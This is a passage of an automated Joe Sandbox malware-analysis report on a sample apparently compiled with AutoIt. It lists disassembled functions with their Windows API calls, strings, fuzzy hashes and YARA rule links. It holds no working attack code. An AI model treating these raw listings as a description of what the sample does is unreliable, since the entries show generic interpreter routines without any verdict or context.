String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: f5a824fb2456c49ef465aaba80dc837483554744ea64134b8d38c39c4d55152b
Instruction ID: b128176cdbdaeb6a29f0a7ae2a9775c119fdcda1fef0799aa7efd67eae6839b4
Opcode Fuzzy Hash: f5a824fb2456c49ef465aaba80dc837483554744ea64134b8d38c39c4d55152b
Instruction Fuzzy Hash: DD616B71108301AFC701DF64DC85EAFBBE8EF89710F4009AEF591972A1DB709A49CB62

Function 00B94619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B946AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B946F6

Strings

EXISTS, xrefs: 00B9475F
CHECK, xrefs: 00B94716
GETSELECTED, xrefs: 00B94806
ISCHECKED, xrefs: 00B94879
UNCHECK, xrefs: 00B948D2
COLLAPSE, xrefs: 00B9473C
SELECT, xrefs: 00B948A7
GETTEXT, xrefs: 00B94849
GETITEMCOUNT, xrefs: 00B947D8
EXPAND, xrefs: 00B947A8
GETTOTALCOUNT, xrefs: 00B946DD

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: ffd8678802931d3a3762444d5b39012736ec0db28082f358bc60136ced8cf9eb
Instruction ID: 1a0390326e434e8c48326e2a1d983585165212046695a2d080d74db5b9437c27
Opcode Fuzzy Hash: ffd8678802931d3a3762444d5b39012736ec0db28082f358bc60136ced8cf9eb
Instruction Fuzzy Hash: AB914B742043419BCF14EF10C4A1EAEB7E5AF95354F5488ECE8965B3A2CB35ED4ACB81

Function 00B9BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B9BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00B96D80,?), ref: 00B9BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B9BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B9BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B9BC7D
FreeLibrary.KERNEL32(?), ref: 00B9BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B9BC99
DestroyIcon.USER32(?), ref: 00B9BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B9BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B9BCD1

Part of subcall function 00B3313D: __wcsicmp_l.LIBCMT ref: 00B331C6

Strings

.exe, xrefs: 00B9BB04
.dll, xrefs: 00B9BB27
.icl, xrefs: 00B9BAE4

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 655c5f90415ac0834bee8122af14f79f4b4110cc23240dff803fe6f5589c3606
Instruction ID: 73bd285d3040560003985872292814915f3dc0848e61228ff93e7145be597f27
Opcode Fuzzy Hash: 655c5f90415ac0834bee8122af14f79f4b4110cc23240dff803fe6f5589c3606
Instruction Fuzzy Hash: AC610371A00219BAEF14DF64DD82FBE77F8EB08720F1041AAF915D61D0DB749980CBA0

Function 00B7A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

CharLowerBuffW.USER32(?,?), ref: 00B7A636
GetDriveTypeW.KERNEL32 ref: 00B7A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7A730

Part of subcall function 00B17D2C: _memmove.LIBCMT ref: 00B17D66

Strings

wait, xrefs: 00B7A6ED
set cd door , xrefs: 00B7A6D1
type cdaudio alias cd wait, xrefs: 00B7A6AE
closed, xrefs: 00B7A64A, 00B7A653
close cd wait, xrefs: 00B7A71B
close, xrefs: 00B7A63C
open, xrefs: 00B7A65D
open , xrefs: 00B7A692

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 299298589498de292e02988c7a7c77e346fba14243320c98b874e7b05d56df79
Instruction ID: fda822c4fc1b0d11b66eb71394514cac6f53bc4d218b7f3495b34be67e6358c8
Opcode Fuzzy Hash: 299298589498de292e02988c7a7c77e346fba14243320c98b874e7b05d56df79
Instruction Fuzzy Hash: 06515C711043059FC700EF20C9919AAB7F8FF84718F5489ADF89A97261DB31EE4ACB52

Function 00B7A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B7A47A
__swprintf.LIBCMT ref: 00B7A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B7A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B7A4FE
_memset.LIBCMT ref: 00B7A51D
_wcsncpy.LIBCMT ref: 00B7A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B7A58E
CloseHandle.KERNEL32(00000000), ref: 00B7A599
RemoveDirectoryW.KERNEL32(?), ref: 00B7A5A2
CloseHandle.KERNEL32(00000000), ref: 00B7A5AC

Strings

:, xrefs: 00B7A4BD
\??\%s, xrefs: 00B7A496
\, xrefs: 00B7A4B2

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 3937b93fd0655afa98354f1ade3de93b3cdf3382938c013296ae7d3e92134617
Instruction ID: cb0d8f866135e05905c903f263ef71cd0b83cbfe54d897d3ecee839e9962530b
Opcode Fuzzy Hash: 3937b93fd0655afa98354f1ade3de93b3cdf3382938c013296ae7d3e92134617
Instruction Fuzzy Hash: 74318DB650411AABDB219FA0DC49FEF77BCEF88711F2041B6FA18D2160EB7496448B25

Function 00B4AB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 00B4AB7B
___wtomb_environ.LIBCMT ref: 00B4AB9D

Part of subcall function 00B38D68: __getptd_noexit.LIBCMT ref: 00B38D68

__malloc_crt.LIBCMT ref: 00B4ABC5
__malloc_crt.LIBCMT ref: 00B4ABE2
_free.LIBCMT ref: 00B4AC19
__recalloc_crt.LIBCMT ref: 00B4AC52
__recalloc_crt.LIBCMT ref: 00B4AC97
_strlen.LIBCMT ref: 00B4ACC3
__calloc_crt.LIBCMT ref: 00B4ACCD
_strlen.LIBCMT ref: 00B4ACDC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00B4AD0A
_free.LIBCMT ref: 00B4AD24
_free.LIBCMT ref: 00B4AD31
_free.LIBCMT ref: 00B4AD43
__invoke_watson.LIBCMT ref: 00B4AD5D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 674bc893685bb28950aad4446d0ebe3e50d08ab3025fa337cd215e4f715fea4b
Instruction ID: 2e19c07951355136963b761f5ae1cc19c4f850a75dc0370a20d15b119e982a69
Opcode Fuzzy Hash: 674bc893685bb28950aad4446d0ebe3e50d08ab3025fa337cd215e4f715fea4b
Instruction Fuzzy Hash: 25610772941316AFDB205F24DC42B697BE9EF11721F2041EAF801AB2D1EB75DA40D793

Function 00B9C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B9C4EC
GetFocus.USER32 ref: 00B9C4FC
GetDlgCtrlID.USER32(00000000), ref: 00B9C507
_memset.LIBCMT ref: 00B9C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B9C65D
GetMenuItemCount.USER32(?), ref: 00B9C67D
GetMenuItemID.USER32(?,00000000), ref: 00B9C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B9C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B9C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B9C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B9C779

Strings

0, xrefs: 00B9C62A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 38c1cac4bf699c776e710dd3159721368272abedd72cc49f9e65fce061ad4a9f
Instruction ID: 324477b264d315eccaeab48f8ee022dc2ec304472035f11807cb5f28d9f932de
Opcode Fuzzy Hash: 38c1cac4bf699c776e710dd3159721368272abedd72cc49f9e65fce061ad4a9f
Instruction Fuzzy Hash: 28817D71208301AFDB10CF14C985A6BBBE9FB98314F1049BEF995972A1DB30DD05CBA2

Function 00B683F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B68766
Part of subcall function 00B6874A: GetLastError.KERNEL32(?,00B6822A,?,?,?), ref: 00B68770
Part of subcall function 00B6874A: GetProcessHeap.KERNEL32(00000008,?,?,00B6822A,?,?,?), ref: 00B6877F
Part of subcall function 00B6874A: HeapAlloc.KERNEL32(00000000,?,00B6822A,?,?,?), ref: 00B68786
Part of subcall function 00B6874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B6879D

Part of subcall function 00B687E7: GetProcessHeap.KERNEL32(00000008,00B68240,00000000,00000000,?,00B68240,?), ref: 00B687F3
Part of subcall function 00B687E7: HeapAlloc.KERNEL32(00000000,?,00B68240,?), ref: 00B687FA
Part of subcall function 00B687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B68240,?), ref: 00B6880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B68458
_memset.LIBCMT ref: 00B6846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B6848C
GetLengthSid.ADVAPI32(?), ref: 00B6849D
GetAce.ADVAPI32(?,00000000,?), ref: 00B684DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B684F6
GetLengthSid.ADVAPI32(?), ref: 00B68513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B68522
HeapAlloc.KERNEL32(00000000), ref: 00B68529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B6854A
CopySid.ADVAPI32(00000000), ref: 00B68551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B68582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B685A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B685BC

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: ab92060b88db6f28340292b241826cde7ff7788e672445e083e593fa9bceaa97
Instruction ID: 3b271d662d00c75a95f4704f38b97ec19438b0a67b2705d1de1c260d6e5a951c
Opcode Fuzzy Hash: ab92060b88db6f28340292b241826cde7ff7788e672445e083e593fa9bceaa97
Instruction Fuzzy Hash: BA612C7190020AABDF10DF94DD45AAEBBB9FF04310F1482AAE915E7291DB359A15CF60

Function 00B8762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B876A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B876AE
CreateCompatibleDC.GDI32(?), ref: 00B876BA
SelectObject.GDI32(00000000,?), ref: 00B876C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B8771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B87757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B8777B
SelectObject.GDI32(00000006,?), ref: 00B87783
DeleteObject.GDI32(?), ref: 00B8778C
DeleteDC.GDI32(00000006), ref: 00B87793
ReleaseDC.USER32(00000000,?), ref: 00B8779E

Strings

(, xrefs: 00B87723

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 62d06b7b6a3130fd092fdde7789a0523966783e532c8234a649e7e82eaf5c16f
Instruction ID: a6f24a791ce8b28ce2befc2d5983b4ad6374b186b3ab825a9dfca6bece559793
Opcode Fuzzy Hash: 62d06b7b6a3130fd092fdde7789a0523966783e532c8234a649e7e82eaf5c16f
Instruction Fuzzy Hash: 29513A75904209EFCB15DFA8CC85EAEBBF9EF48710F24846AE94997220DA31A840CB50

Function 00B7A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00B9FB78), ref: 00B7A0FC

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 00B7A11E
__swprintf.LIBCMT ref: 00B7A177
__swprintf.LIBCMT ref: 00B7A190
_wprintf.LIBCMT ref: 00B7A246
_wprintf.LIBCMT ref: 00B7A264

Strings

Error: , xrefs: 00B7A20E
"%s" (%d) : ==> %s:, xrefs: 00B7A25F
^ ERROR, xrefs: 00B7A1E8
"%s" (%d) : ==> %s:%s%s, xrefs: 00B7A241
Line %d (File "%s"):, xrefs: 00B7A171, 00B7A18A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 24f8cde788acc76be93b90bdd2076fb6151d26b4c2de674fe8bdd56aa9842f56
Instruction ID: e3c9d3e95cd83b9d86a78e2665a426e78f29b9474eabdadecf0d3ceda9a71165
Opcode Fuzzy Hash: 24f8cde788acc76be93b90bdd2076fb6151d26b4c2de674fe8bdd56aa9842f56
Instruction Fuzzy Hash: 41514D7294010AAADF15EBA0CD86EEEB7F9AF14300F6041E5F515730A1EB316E98CB61

Function 00B16BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00B30B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B16C6C,?,00008000), ref: 00B30BB7

Part of subcall function 00B148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B148A1,?,?,00B137C0,?), ref: 00B148CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B16D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00B16E5A

Part of subcall function 00B159CD: _wcscpy.LIBCMT ref: 00B15A05

Part of subcall function 00B3387D: _iswctype.LIBCMT ref: 00B33885

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00B4E8BF
Unterminated string, xrefs: 00B4EC0D
Bad directive syntax error, xrefs: 00B4EBC6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00B4E84A
AU3!, xrefs: 00B16CC1
Error opening the file, xrefs: 00B4E866, 00B4E8E1
EA06, xrefs: 00B4E87B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: e7b6b77b9fb764d4bc82eac03ca773777c22b138a4f713a96c3514d5f98b54ef
Instruction ID: b9a7d25a99ae2a92c88fa9a9d2715486e29b57a7fa1c1679f656d70d11f8708c
Opcode Fuzzy Hash: e7b6b77b9fb764d4bc82eac03ca773777c22b138a4f713a96c3514d5f98b54ef
Instruction Fuzzy Hash: 77028B311083419FC724EF24C881AAFBBE5FF89354F54499DF49A972A1DB30DA89DB42

Function 00B145DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B145F9
GetMenuItemCount.USER32(00BD6890), ref: 00B4D7CD
GetMenuItemCount.USER32(00BD6890), ref: 00B4D87D
GetCursorPos.USER32(?), ref: 00B4D8C1
SetForegroundWindow.USER32(00000000), ref: 00B4D8CA
TrackPopupMenuEx.USER32(00BD6890,00000000,?,00000000,00000000,00000000), ref: 00B4D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B4D8E9

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 463817a98c2dac78a46aeb5bf82f5c091f0558f3e7aa5b061ecc5d07d62f91ca
Instruction ID: cdde16d5099897e491081180ae6cc140a6ee9c7200fe422165e2b94b19f4b3d4
Opcode Fuzzy Hash: 463817a98c2dac78a46aeb5bf82f5c091f0558f3e7aa5b061ecc5d07d62f91ca
Instruction Fuzzy Hash: 6171F870600205BAEB218F14DC85FAABFE4FF05368F204296F525A61E1CBB19D50EB90

Function 00B910A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B90038,?,?), ref: 00B910BC

Strings

HKEY_LOCAL_MACHINE, xrefs: 00B91125
HKCC, xrefs: 00B9118A
HKLM, xrefs: 00B9113A
HKU, xrefs: 00B911CE
HKEY_CURRENT_USER, xrefs: 00B9119B
HKEY_USERS, xrefs: 00B911BD
HKCU, xrefs: 00B911AC
HKEY_CURRENT_CONFIG, xrefs: 00B91179
HKCR, xrefs: 00B91164
HKEY_CLASSES_ROOT, xrefs: 00B9114F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: b19a0d5dd9a0e0e1f1c81eb9ef2db793caca9e51aec55d53e38fe917582a39c4
Instruction ID: c3beb468e1b1ee33789ba2ad2b92cf769bd899aada80b47a58a187980c1a0b0e
Opcode Fuzzy Hash: b19a0d5dd9a0e0e1f1c81eb9ef2db793caca9e51aec55d53e38fe917582a39c4
Instruction Fuzzy Hash: 91412C3116025B9BCF10FF94D9A1AEF37E8EF11340F5048E9EC916B291DB30A95ADB60

Function 00B75569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00B17D2C: _memmove.LIBCMT ref: 00B17D66

Part of subcall function 00B17A84: _memmove.LIBCMT ref: 00B17B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B755D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B755E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B755F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B7560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B7561C

Strings

play PlayMe, xrefs: 00B75617
play PlayMe wait, xrefs: 00B75606
close PlayMe, xrefs: 00B755E3, 00B75610
alias PlayMe, xrefs: 00B755AB
status PlayMe mode, xrefs: 00B755CD
open , xrefs: 00B75581

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
